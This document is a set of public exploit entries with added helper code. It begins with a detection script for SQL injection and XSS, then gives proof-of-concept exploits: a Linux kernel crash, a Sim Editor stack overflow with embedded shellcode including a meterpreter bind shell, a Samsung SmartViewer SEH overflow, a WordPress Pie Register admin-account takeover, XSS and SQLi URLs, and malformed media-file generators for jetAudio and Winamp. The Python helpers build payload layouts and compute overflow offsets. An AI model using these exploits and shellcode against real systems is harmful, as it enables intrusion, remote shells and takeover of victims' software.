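    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Patterns are applied to the decoded, lower-cased target. Each rule maps to
# one technique used in the requests above.
RULES = {
    "sqli:union-select": re.compile(r"\bunion\b[\s\S]{0,40}?\bselect\b"),
    "sqli:schema-enum": re.compile(r"information_schema"),
    "sqli:error-based-floor-rand": re.compile(r"floor\s*\(\s*rand\s*\("),
    "sqli:version-probe": re.compile(r"\bversion\s*\(\s*\)"),
    "sqli:comment-tail": re.compile(r"\s--(?:\s|$)"),
    "xss:script-tag": re.compile(r"<\s*/?\s*script\b"),
    "xss:event-handler": re.compile(r"<[^>]*\bon[a-z]+\s*="),
}


def decode_target(target):
    """URL-decode twice (so %2527 ends up as a quote too) and lower-case."""
    return unquote_plus(unquote_plus(target)).lower()


def classify(target):
    """Return the names of every rule the decoded target matches, in rule order."""
    decoded = decode_target(target)
    return [name for name, rx in RULES.items() if rx.search(decoded)]


def scan_log(text):
    """Return (client ip, decoded target, [rule names]) for each flagged line.
    Lines that do not parse as CLF are skipped instead of aborting the scan."""
    hits = []
    for line in text.splitlines():
        m = CLF.match(line.strip())
        if not m:
            continue
        rules = classify(m.group("target"))
        if rules:
            hits.append((m.group("ip"), decode_target(m.group("target")), rules))
    return hits


if __name__ == "__main__":
    for ip, target, rules in scan_log(SAMPLE_LOG):
        print(f"{ip} {', '.join(rules)}\n    {target}")
```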
            
/*
source: https://www.securityfocus.com/bid/48101/info

The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to trigger a kernel crash, which may result in a denial-of-service condition. 
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#define BUFSIZE getpagesize()

int main(int argc, char **argv)
{
	void *ptr;
	/* posix_memalign() returns an errno value on failure, not -1. */
	int rc = posix_memalign(&ptr, getpagesize(), BUFSIZE);
	if (rc != 0) {
		fprintf(stderr, "posix_memalign: %s\n", strerror(rc));
		exit(1);
	}
	/* Hand the page to KSM, then fault on a NULL write so the process
	   dies while the page is still marked mergeable. */
	if (madvise(ptr, BUFSIZE, MADV_MERGEABLE) < 0) {
		perror("madvise");
		exit(1);
	}
	*(char *)NULL = 0;
	return 0;
}
            
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SIZE 65536  

/*
 * Title: Sim Editor v6.6 Stack Based Buffer Overflow
 * Version: 6.6
 * Tested on: Windows XP sp2 en, Windows 8 64-bit
 * Date: 16-01-2015
 * Author: Osanda Malith Jayathissa
 * E-Mail: osanda[cat]unseen.is
 * Website: OsandaMalith.wordpress.com
 * CVE: CVE-2015-1171
 */

const char shell1[] = "ba516a43ddd9e9d97424f45e33c9b1" 
        		"3231561503561583eefce2a496ab54" 
        		"46672c07cf821d15abc70ca9b88abc"
        		"42ec3e36263830ff8d1e7f00209ed3"
        		"c222622e17855be16ac49c1c849475"
        		"6a3709f22e8428d424b45251fa41e9"
        		"582bf96612d3712082e25632feadd3"
        		"81752c32d8761e7ab749ae77c98e09"
        		"68bce46915c73f13c142ddb382f505"
        		"454663ce4923e7884db224a36a3fcb"
        		"63fb7be8a7a7d891fe0d8eaee0ea6f"
        		"0b6b187b2d36777abf4d3e7cbf4d11"
        		"158ec6fe620f0dbb9d450fea3500da"
        		"ae5bb331ec6530b38d9128b688deee"
        		"2be14f9b4b566f8e262bff50d1a58b"
        		"92"; 

/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */
const char shell2[] = "bb3ff8edc8dbc6d97424f45f2bc9b1"
		"4a83effc315f11035f11e2ca04054e"
		"34f5d62fbd10e77dd9515ab2aa3457"
		"39feacec4fd6c345e500ed56cb8ca1"
		"954d70b8c9ad49731caf8e6eeffd47"
		"e44212ecb85e99be2ce77e744cc6d0"
		"0317c8d3c02341cc050f1b67fdfb9a"
		"a1cc04ad8d823a0100db7ba6fbae77"
		"d486a843a65c3d560016e5b2b0fb73"
		"30beb0f01ea347d514dfccd8fa6996"
		"fede324c9f479f23a098479b04d26a"
		"c831b9e23d7342f3290431c1f6bedd"
		"697e18198d55dcb570561c9fb6024c"
		"b71f2b07479ffe87170f5167c8ef01"
		"0f02e07e2f2d2a179e098670e2ad38"
		"dd6b4b50cd3dc3cd2f1adc6a4f4970"
		"22c7c69ef4e8d7b45644705f2d8645"
		"7e3283ee17a5597e55575dab0f97cb"
		"5786c06355ff272ca62a3ce532952b"
		"0ad215ac5cb815c4389845f14635fa"
		"aad2b5ab1f74dd5179b242a9ac42bf"
		"7c89c0c90af908";

const char *shells[] = { shell1, shell2 };
const char *shell_names[] = { "MS Paint", "Bind Shell" };
const char *shell_info[] = { "", "[*] Connect on port 4444\n" };
const size_t SHELLS_COUNT = 2;

int menu() {
    int shell_type = -1;
    puts("\b[?] Choose an Option: ");
    size_t i;
    for (i = 0; i < SHELLS_COUNT; i++) printf("%zu. %s\n", i, shell_names[i]);
    /* A non-numeric answer leaves -1, which main() rejects. */
    if (scanf("%d", &shell_type) != 1) return -1;
    return shell_type;
}

void banner() {
    static const char banner[] =                                                                                                
                " _____ _          _____   _ _ _           \n"
                "|   __|_|_____   |   __|_| |_| |_ ___ ___ \n"
                "|__   | |     |  |   __| . | |  _| . |  _|\n"
                "|_____|_|_|_|_|  |_____|___|_|_| |___|_|\n"
                "\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\n"
                "[~] Author: Osanda Malith Jayathissa\n"
                "[~] E-Mail: osanda[cat]unseen.is\n"
                "[~] Website: OsandaMalith.wordpress.com\n\n";

    fputs(banner, stdout);   /* fwrite with sizeof(banner) would also emit the NUL */
}

void patternfill(char *dst, char *pattern, size_t count, size_t dst_size) {
    size_t pattern_len = strlen(pattern);
    count *= pattern_len;
    if (count > dst_size) count = dst_size;
    if (pattern_len > dst_size) pattern_len = dst_size;

    size_t i, pI;
    for (i = 0, pI = 0; i < count ; i++, pI++) {
        if (pI == pattern_len) pI = 0;
        dst[i] = pattern[pI];
    }
}

int main() {
    banner();
    int shell_type = menu();
    if (shell_type < 0 || (size_t)shell_type >= SHELLS_COUNT) {
        printf("[-] Enter a valid input\n");
        exit (1);
    }

    /* Both buffers hold hex text, two characters per byte; calloc
       zero-fills them so they stay NUL-terminated. */
    char *buff = (char*) calloc (SIZE, sizeof(char));
    char *nops = (char*) calloc (SIZE, sizeof(char));
    if (!buff || !nops) exit (1);

    patternfill(buff, "41", 405, SIZE);   /* 405 x 'A' filler */
    patternfill(nops, "90", 16, SIZE);    /* 16 x NOP */

    char ret[] = "B3804200";   /* return address as little-endian hex text */
    const char* filename = "exploit.sms";

    FILE *outfile = fopen(filename, "w");
    if (!outfile) {
        printf("%s\n","Could not open file");
        exit (1);
    }

    fputs(buff,   outfile);
    fputs(ret,    outfile);
    fputs(nops,   outfile);

    fputs(shells[shell_type],  outfile);
    printf("%s", shell_info[shell_type]);
    fclose(outfile);
    free(buff);
    free(nops);
    printf("[+] Successfully written to: \"%s\"\n", filename);
    return 0;
}
/*EOF*/
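The PoC above writes its payload as hex text (two characters per byte: "41" for 'A', "90" for a NOP, "B3804200" for the little-endian return address 0x004280B3), so the offsets that matter are in decoded bytes, not in characters of the file. The following Python is an added example and not part of the original exploit: it builds the same layout for an arbitrary return address, then decodes the text back to bytes and confirms where each region lands. The shellcode bytes are a constructed stand-in, not the PoC's shells[] table.

```python
def le32_hex(addr):
    """The 8 hex characters the PoC writes for a 32-bit address: little-endian
    byte order, so 0x004280B3 becomes 'B3804200'."""
    return addr.to_bytes(4, "little").hex().upper()


def build_sms(ret_addr, shellcode, junk_len=405, nop_count=16):
    """Hex-text body with the PoC's layout: junk | return address | NOP sled | shellcode.
    shellcode is raw bytes and is hex-encoded the same way as the other regions."""
    return "41" * junk_len + le32_hex(ret_addr) + "90" * nop_count + shellcode.hex().upper()


def check_layout(text, ret_addr, junk_len=405, nop_count=16):
    """Decode the hex text and confirm each region lands at the intended byte offset.
    Returns (ok, offsets). An odd-length text means a stray character has shifted every
    following byte by a nibble, which silently breaks the return address."""
    if len(text) % 2:
        raise ValueError("hex text has odd length: a stray character misaligned the payload")
    raw = bytes.fromhex(text)
    ret_off = junk_len
    nop_off = ret_off + 4
    sc_off = nop_off + nop_count
    ok = (raw[:ret_off] == b"A" * junk_len
          and raw[ret_off:nop_off] == ret_addr.to_bytes(4, "little")
          and raw[nop_off:sc_off] == b"\x90" * nop_count)
    return ok, {"ret": ret_off, "nops": nop_off, "shellcode": sc_off}


if __name__ == "__main__":
    SHELLCODE = b"\xcc" * 8          # constructed stand-in (int3 x 8), not the PoC's shellcode
    body = build_sms(0x004280B3, SHELLCODE)
    print(check_layout(body, 0x004280B3))
```

Because the file is text, the return address sits at character 810 but at byte 405; check_layout is the test to run after any change to the junk length or the shellcode table.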
            
<html>
<!--
Samsung SmartViewer BackupToAvi Remote Code Execution PoC 
PoC developed by Praveen Darshanam 

For more details refer
http://darshanams.blogspot.com
http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html
Original Vulnerability Discovered by rgod
Vulnerable: Samsung SmartViewer 3.0
Tested on Windows 7 Ultimate N SP1
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265
-->

<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object>
<script >
 var payload_length = 15000;
 var arg1=1;
 var arg2=1;
 var arg3=1;
 //blank strings
 var junk = "";
 var buf1 = "";
 var buf2 = "";

 //offset to SE is 156, initial analysis using metasploit cyclic pattern
 for (i=0; i<156; i++)
 {
  buf1 += "A";
 }
 var nseh = "DD";
 var seh = "\x87\x10";	//from Vulnerable DLL
 junk = buf1 + nseh + seh;

 //remaining buffer
 for (j=0; j<(payload_length-junk.length); j++)
 {
  buf2 += "B";
 }
 //final malicious buffer
 var fbuff = junk + buf2;
 target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);

</script>
</html>
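The comment in the PoC above says the 156-byte offset to the SEH record was found with a Metasploit cyclic pattern. As an added example that is not part of the PoC, here is that technique in Python: generate the pattern, then map the dword the debugger shows in the overwritten handler slot back to its offset. The EXCEPTION_REGISTRATION record is {next, handler}, so a handler value found at offset 160 puts nSEH at 156, which is the layout the PoC uses. The constants 0x41326641 and 0x66413366 below are simply the pattern's own bytes at offsets 156 and 160, read as little-endian dwords; they are not values taken from the advisory.

```python
import string

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 bytes before the pattern repeats


def pattern_create(length):
    """Metasploit-style cyclic pattern 'Aa0Aa1Aa2...': every 4-byte window is unique
    within the first MAX_UNIQUE bytes, so a dword pulled from a crash maps to one offset."""
    if length > MAX_UNIQUE:
        raise ValueError("pattern would repeat beyond %d bytes" % MAX_UNIQUE)
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern, needle):
    """Offset of needle in pattern, or -1. An int is treated as an x86 dword as the
    debugger prints it (little-endian in memory); a str/bytes is matched literally."""
    if isinstance(needle, int):
        needle = needle.to_bytes(4, "little")
    elif isinstance(needle, str):
        needle = needle.encode()
    idx = pattern.find(needle)
    if idx < 0:
        idx = pattern.find(needle[::-1])   # the same dword read big-endian
    return idx


def seh_offsets(pattern, handler_dword):
    """(nSEH offset, SEH handler offset) given the dword that overwrote the handler:
    nSEH is the 4 bytes immediately before the handler pointer."""
    seh = pattern_offset(pattern, handler_dword)
    if seh < 4:
        raise ValueError("handler value not found in pattern (or too close to its start)")
    return seh - 4, seh


if __name__ == "__main__":
    p = pattern_create(15000)          # same length as the PoC's buffer
    print(seh_offsets(p, 0x66413366))  # (156, 160)
```

Send pattern_create(15000) in place of fbuff, read the handler value from the debugger's exception chain, and feed it to seh_offsets; the first element is where nseh goes and the second is where the address of the chosen pop/pop/ret goes.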
            
# Exploit Title: Pie Register 2.0.13 Privilege escalation
# Date: 16-10-2014
# Software Link: https://wordpress.org/plugins/pie-register/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-8802
# Category: webapps

1. Description
  
Anyone can upload a CSV file, without logging in, and Pie Register will import the users it lists, including the value of the "Role" column. The import is hooked into WordPress's init action and fires on any request that carries a csvfile upload; nothing in the path shown checks who is making the request.

File: pie-register\pie-register.php

add_action( 'init', array($this,'pie_main') );
function pie_main() {
	// I skip unnecessary lines
	if(isset($_FILES['csvfile']['name'])) {
		$this->importUsers();
	}
}

http://security.szurek.pl/pie-register-2013-privilege-escalation.html

2. Proof of Concept

Create CSV file based on given example:

"Username","Display name","E-mail","User Registered","First Name","Last Name","Nickname","Role"
"hack","Hacked","hacked@hacked.hacked","2010-10-10 20:00:00","Hacked","Hacked","Hacked","administrator"

Import account using:

<form method="post" action="http://wordpress-instalation" enctype="multipart/form-data">
    Input CSV<input type="file" name="csvfile">
    <input type="submit" value="Add user!">
</form>

Create another standard account using wp-login.php?action=register.

After logging in, go to wp-admin/profile.php and search the page source for "uid".

The number after "uid" is the id of our current account, for example "uid":"123".

The imported admin account was created just before ours, so its id should be id-1 (or id-x for some small natural number x, if other accounts were created in between).

We can activate this account using:

<form method="post" action="http://wordpress-instalation">
    <input type="hidden" name="verifyit" value="1">
    Account id:<input type="text" name="vusers[]" value="">
    <input type="submit" value="Activate user!">
</form>

Finally we can reset password using: http://wordpress-instalation/wp-login.php?action=lostpassword
  
3. Solution:
  
Update to version 2.0.14
https://downloads.wordpress.org/plugin/pie-register.2.0.14.zip
            
source: https://www.securityfocus.com/bid/48106/info

vBulletin vBExperience is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

vBulletin vBExperience 3.0 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/xperience.php?sortfield=xr&sortorder="><script>alert(1);</script> 
            
source: https://www.securityfocus.com/bid/48108/info

Joomla CCBoard is prone to an SQL-injection vulnerability and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.

Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?option=com_ccboard&view=postlist&forum=1&topic=2 
            
# Exploit Title     	: jetAudio 8.1.3 Basic Use-after-free (Corrupted mp4) Crash POC
# Product				: jetAudio Basic
# Date              	: 12.12.2014
# Exploit Author    	: ITDefensor Vulnerability Research Team http://itdefensor.ru/
# Software Link     	: http://www.jetaudio.com/download/
# Vulnerable version	: 8.1.3 (Latest at the moment) and probably previous versions
# Vendor Homepage   	: http://www.jetaudio.com/
# Tested on         	: jetAudio 8.1.3 Basic installed on Windows 7 x64, Windows Server 2008, Windows 7 x86
# CVE 					: unknown at the moment
#============================================================================================
# Open created POC file (fault.mp4) with jetAudio
# Details
# 	(6e74.6e20): Access violation - code c0000005 (first chance)
#  First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
#JFDSPL!JPluginCreate+0x338f8:
#0a1a7588 8b11            mov     edx,dword ptr [ecx]  ds:002b:050aacf8=????????
#0:000:x86> kb
#ChildEBP RetAddr  Args to Child              
#WARNING: Stack unwind information not available. Following frames may be wrong.
#0018feec 72512466 00000000 00000000 00000000 JFDSPL!JPluginCreate+0x338f8
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for JetAudio.exe - 
#0018ff00 005961ba 00000000 f9b7337c 00000000 MSVCR90!exit+0x11
#0018ff88 7558338a 7efde000 0018ffd4 771e9f72 JetAudio!CxIOFile::~CxIOFile+0x19414a
#0018ff94 771e9f72 7efde000 765bba31 00000000 kernel32!BaseThreadInitThunk+0xe
#0018ffd4 771e9f45 00596315 7efde000 00000000 ntdll32!__RtlUserThreadStart+0x70
#0018ffec 00000000 00596315 7efde000 00000000 ntdll32!_RtlUserThreadStart+0x1b
#0:000:x86> u 0a1a7588 
#JFDSPL!JPluginCreate+0x338f8:
#0a1a7588 8b11            mov     edx,dword ptr [ecx]
#0a1a758a 8b420c          mov     eax,dword ptr [edx+0Ch]
#0a1a758d 6a01            push    1
#0a1a758f 6870ff1d0a      push    offset JFDSPL!CxIOFile::~CxIOFile+0x303e0 (0a1dff70)
#0a1a7594 ffd0            call    eax
#0a1a7596 6aff            push    0FFFFFFFFh
#0a1a7598 6a00            push    0
#0a1a759a 8d8e043d0000    lea     ecx,[esi+3D04h]
#============================================================================================
#!/usr/bin/python
  
pocdata=("\x00\x00\x00\xFA\x66\x74\x79\x70\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x00\x00\x00\x00\x6D\x70\x34\x32\x69\x73\x6F\x6D\x61\x76\x63\x31\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x6D\x70\x34\x32\x00\x00")
  
mp4file = "fault.mp4"
# Write in binary mode so bytes >= 0x80 and 0x0A/0x0D reach the file unchanged
# (text mode would re-encode or translate them); latin-1 maps each \xNN to one byte.
with open(mp4file, "wb") as f:
    f.write(pocdata.encode("latin-1"))
            
# Exploit Title     	:  Winamp 5.666 build 3516 'f263.w5s' (Corrupted flv) Crash POC
# Product				:  Winamp  5.666 build 3516
# Date              	:  12.12.2014
# Exploit Author    	:  ITDefensor Vulnerability Research Team http://itdefensor.ru/
# Software Link     	:  http://winampplugins.co.uk/Winamp/
# Vulnerable version	:  Winamp  5.666 build 3516 (Latest at the moment) and probably previous versions
# Vendor Homepage   	:  http://www.winamp.com/
# Tested on         	:  Winamp  5.666 build 3516 installed on Windows 7 x64
# CVE 					:  unknown at the moment
#============================================================================================
# Open created POC file (fault.flv) with Winamp
# Details

#(7714.ac58): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#f263!GetWinamp5SystemComponent+0x1951:
#08572f15 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:e54d18b6=??
#0:021:x86> u eip
#f263!GetWinamp5SystemComponent+0x1951:
#08572f15 0fb601          movzx   eax,byte ptr [ecx]
#08572f18 0fb67901        movzx   edi,byte ptr [ecx+1]
#08572f1c c1e008          shl     eax,8
#08572f1f 0bc7            or      eax,edi
#08572f21 0fb67902        movzx   edi,byte ptr [ecx+2]
#08572f25 0fb64903        movzx   ecx,byte ptr [ecx+3]
#08572f29 c1e008          shl     eax,8
#08572f2c 0bc7            or      eax,edi


#!/usr/bin/python
  
flvheader=("\x46\x4C\x56\x01\xC5\x00\x00\x00\x09\x00\x00\x00\x00")
flvscripdatatag1 = ("\x12\x00\x02\x76\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0A\x6F\x6E\x4D\x65\x74\x61\x44\x61\x74\x61\x08\x00\x00\x00\x1C\x00\x0B\x68\x61\x73\x4D\x65\x74\x61\x64\x61\x74\x61\x01\x01\x00\x08\x68\x61\x73\x56\x69\x64\x65\x6F\x01\x01\x00\x08\x68\x61\x73\x41\x75\x64\x69\x6F\x01\x01\x00\x08\x64\x75\x72\x61\x74\x69\x6F\x6E\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x0D\x6C\x61\x73\x74\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x15\x6C\x61\x73\x74\x6B\x65\x79\x66\x72\x61\x6D\x65\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x77\x69\x64\x74\x68\x00\x40\x89\x00\x00\x00\x00\x00\x00\x00\x06\x68\x65\x69\x67\x68\x74\x00\x40\x82\xC0\x00\x00\x00\x00\x00\x00\x0D\x76\x69\x64\x65\x6F\x64\x61\x74\x61\x72\x61\x74\x65\x00\x40\xBA\x2F\x4B\x7A\x6F\x4D\xEA\x00\x09\x66\x72\x61\x6D\x65\x72\x61\x74\x65\x00\x40\x35\xBD\x37\xA6\xF4\xDE\x9C\x00\x0D\x61\x75\x64\x69\x6F\x64\x61\x74\x61\x72\x61\x74\x65\x00\x40\x55\xDD\xD3\x7A\x6F\x4D\xEA\x00\x0F\x61\x75\x64\x69\x6F\x73\x61\x6D\x70\x6C\x65\x72\x61\x74\x65\x00\x40\xD5\x88\x80\x00\x00\x00\x00\x00\x0F\x61\x75\x64\x69\x6F\x73\x61\x6D\x70\x6C\x65\x73\x69\x7A\x65\x00\x40\x30\x00\x00\x00\x00\x00\x00\x00\x06\x73\x74\x65\x72\x65\x6F\x01\x00\x00\x08\x66\x69\x6C\x65\x73\x69\x7A\x65\x00\x40\xE3\xE1\x00\x00\x00\x00\x00\x00\x09\x76\x69\x64\x65\x6F\x73\x69\x7A\x65\x00\x40\xE3\x47\x20\x00\x00\x00\x00\x00\x09\x61\x75\x64\x69\x6F\x73\x69\x7A\x65\x00\x40\x80\x78\x00\x00\x00\x00\x00\x00\x08\x64\x61\x74\x61\x73\x69\x7A\x65\x00\x40\x85\x18\x00\x00\x00\x00\x00\x00\x0F\x6D\x65\x74\x61\x64\x61\x74\x61\x63\x72\x65\x61\x74\x6F\x72\x02\x00\x0D\x66\x6C\x76\x6D\x65\x74\x61\x20\x31\x2E\x31\x2E\x32\x00\x0C\x6D\x65\x74\x61\x64\x61\x74\x61\x64\x61\x74\x65\x0B\x42\x74\xAF\x38\x0D\x3D\x00\x00\x00\x00\x00\x0C\x61\x75\x64\x69\x6F\x63\x6F\x64\x65\x63\x69\x64\x00\x3F\xF0\x00\x00\x00\x00\x00\x00\x00\x0C\x76\x69\x64\x65\x6F\x63\x6F\x64\x65\x63\x69\x64\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x61\x75\x64\x69\x6F\x64\x65\x6C\x61\x79\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x0C\x63\x61\x6E\x53\x65\x65\x6B\x54\x6F\x45\x6E\x64\x01\x01\x00\x0C\x68\x61\x73\x43\x75\x65\x50\x6F\x69\x6E\x74\x73\x01\x00\x00\x09\x63\x75\x65\x50\x6F\x69\x6E\x74\x73\x0A\x00\x00\x00\x00\x00\x0C\x68\x61\x73\x4B\x65\x79\x66\x72\x61\x6D\x65\x73\x01\x01\x00\x09\x6B\x65\x79\x66\x72\x61\x6D\x65\x73\x03\x00\x05\x74\x69\x6D\x65\x73\x0A\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0D\x66\x69\x6C\x65\x70\x6F\x73\x69\x74\x69\x6F\x6E\x73\x0A\x00\x00\x00\x01\x00\x40\x85\xC0\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x09\x00\x00\x02\x81")

flvscripdatatag2 = ("\x12\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0C\x6F\x6E\x4C\x61\x73\x74\x53\x65\x63\x6F\x6E\x64\x08\x00\x00\x00\x00\x00\x00")
flvvideotag = ("\x09\x00\x00\x00\x22\x09\x00\x00\x9E\x00\x00\x00\x00\x00\x00\x00\x12\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x9A\x39")
flvaudiotag = ("\x08\x00\x02\x04\x00\x00\x2E\x00\x00\x00\x00\x1A\xBF\xB7\x12\x40\x01\x00\x30\xC2\x3B\x32\x00\xBA\xFD\x6A\x92\x88\x8C\x03\xA9\x38\x02\x89\xA9\x0B\xBD\xE8\x8C\x80\x23\x04\x2C\xE8\xBB\x30\x99\xA3\x2F\xA8\x02\x28\x11\xC2\x8F\x89\xA7\x19\x28\xB0\x99\x40\x40\xB8\x8F\xC1\x02\x41\x12\x08\xC8\x12\x70\x80\x88\x18\xA4\x61\x12\x08\x29\x11\xC2\x21\x3A\x80\x17\x33\x3B\x1A\xF8\x08\x80\x74\x80\x89\x80\xBA\x48\x96\x0B\xA8\x92\x32\x12\x70\x89\xA0\x8A\x25\x28\x82\x98\x3F\xB0\x01\x08\x89\x2E\x90\x90\x01\xBA\x79\xB9\x99\x47\x19\x01\x09\x9B\xBD\xA7\x20\x8A\x9B\x84\x98\x4A\xB4\x1D\xA9\x02\x50\x14\x1C\x81\x90\x29\x02\xAA\xD9\x9C\x12\xD8\x10\x1A\x37\x9A\x20\xDB\xB8\x1C\x13\x86\x28\x89\x13\x09\x9D\xB0\x01\x2A\xD8\xA2\x5C\xB9\x82\xCE\x12\x36\x0A\x99\x01\x82\x08\x02\x61\x93\x71\x08\xBB\x11\x10\x33\x27\x32\x19\x08\xA2\x11\x8F\x06\x99\x18\x81\xDB\x89\x0B\x93\x00\x19\x09\xF2\x3C\xA8\xD8\x08\x18\x17\x8B\x80\x9A\x3C\xF8\x00\x99\xBF\xA0\x08\x91\x8A\x29\x98\xF9\x40\xC9\x0C\x81\xBC\x90\x19\xA2\x59\xC8\x9A\x18\xE0\x08\x0C\xB2\x1B\x37\x00\x0B\x90\x01\x00\x41\xB8\x79\xB2\x9C\x53\x10\x8B\x50\x92\x39\xA0\x98\x73\x42\x43\xAA\x40\x81\x9A\x34\xA8\x53\x87\x48\xA9\xA8\x8A\x96\x10\x23\x19\x94\x00\x43\x88\x3B\x17\x00\x34\x00\x42\x8B\xC0\x10\x01\x89\x65\x89\x30\x24\xA0\x2F\xB2\x89\x88\x8B\xA4\x1C\x81\x93\x49\x99\xCC\xA0\xB8\x8F\xBA\xC2\x2C\x34\x92\x2D\xA2\x0A\x40\x91\x28\xAF\xC8\x03\x18\x29\xFB\x8A\x98\x22\x85\x2C\xAB\xB8\x89\x8C\xA1\x13\xA8\x4D\x87\x8C\x08\x93\x8A\x31\xC9\x19\x26\x88\x29\x22\xEA\x90\x72\x02\x99\x2A\xA1\x92\x79\x04\xAC\x21\x85\x8A\x20\x00\xA2\x11\x09\x44\xBD\xA8\x88\x1A\xB0\x8C\x91\x13\x29\xDB\x8B\xF8\xA9\x40\x61\xF9\x00\x99\x98\x00\x8C\xD8\x20\xB8\x0A\x11\xFC\x0A\xC9\x88\x09\x93\x3A\x01\x9A\xEA\xC0\x0F\x10\x02\x99\x3C\xC0\x9B\x38\xB7\x0B\x99\x99\xF8\x43\x09\x80\x99\x92\x22\x45\x19\x89\xDB\x02\x28\x10\xD0\x20\x12\xB1\xBD\x05\x10\x79\x05\x89\x10\x81\x0C\xB2\x80\x61\x98\x08\x30\xB6\x19\x44\x98\x3A\x98\x82\x18\x76\x09\x10\x91\xCC\x22\xA1\x3A\x09\x92\x9A\x49\xDB\xC8\x31\x12\xC1\x0D\x0A\x83\x01\x70\xA6\x8B\x3A\xA3\x9B\x40\x92\x80\x59\xB2\xAC\x8E\x91\xB9\x10\x20\xBF\x80\xA0\x93\x2C\x0B\x86\x0C\xB1\x41\x84\xA0\x00\x00\x02\x0F")
pocdata = [flvheader, flvscripdatatag1, flvscripdatatag2, flvvideotag, flvaudiotag]
flvfile = "fault.flv"
# The tags are str literals; latin-1 maps each \xNN escape to exactly one byte
# (Python 3 refuses to write a str to a binary file, and text mode would mangle it).
with open(flvfile, "wb") as f:
    f.write("".join(pocdata).encode("latin-1"))
